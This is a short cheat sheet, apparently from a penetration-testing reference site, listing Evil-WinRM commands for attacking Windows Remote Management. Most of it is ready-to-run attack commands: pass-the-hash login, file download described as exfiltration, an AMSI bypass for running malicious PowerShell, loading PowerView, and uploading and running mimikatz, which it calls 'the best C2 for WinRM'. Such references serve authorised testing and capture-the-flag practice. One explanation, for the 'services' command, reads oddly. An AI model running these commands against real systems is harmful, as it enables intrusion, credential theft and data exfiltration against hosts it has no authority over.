commands // 2026-01-05 // ID: REF-Evil-winrm Command List

Evil-winrm Command List


Evil-WinRM Command Guide

Evil-WinRM is the ultimate shell for hacking Windows Remote Management (WinRM). It provides a PowerShell interface with built-in post-exploitation features.

Top 10 Useful Commands

1. Basic Connect

evil-winrm -i 10.10.10.10 -u user -p pass

Explanation: Standard login.

2. Pass The Hash

evil-winrm -i 10.10.10.10 -u user -H <NTLM_HASH>

Explanation: Login without a password if you have the hash.

3. Upload File

*Evil-WinRM* PS > upload /local/path/file.exe

Explanation: Built-in upload command (no certutil needed).

4. Download File

*Evil-WinRM* PS > download C:\Windows\System32\drivers\etc\hosts

Explanation: Exfiltrate data.

5. Load Scripts (Bypass AMSI)

*Evil-WinRM* PS > Bypass-4MSI

Explanation: Execute built-in AMSI bypass to run unsigned malicious powershell.

6. Menu (Features)

*Evil-WinRM* PS > menu

Explanation: Show loaded modules (Invoke-Binary, DllInjection, etc).

7. Load Powershell Script

evil-winrm -i ... -s /path/to/scripts/

Explanation: Load a directory of .ps1 scripts (like PowerView) at startup.

8. Execute Loaded Script

*Evil-WinRM* PS > Invoke-PowerView

Explanation: Run a script loaded via -s.

9. Service Mode

*Evil-WinRM* PS > services

Explanation: List audio/process services.

10. SSL

evil-winrm -i 10.10.10.10 -S

Explanation: Force SSL (valid for port 5986).

The Most Powerful Command

(Interactive):

upload /path/to/mimikatz.exe; ./mimikatz.exe

Explanation: Evil-WinRM makes file transfer and execution trivial, making it the best C2 for WinRM.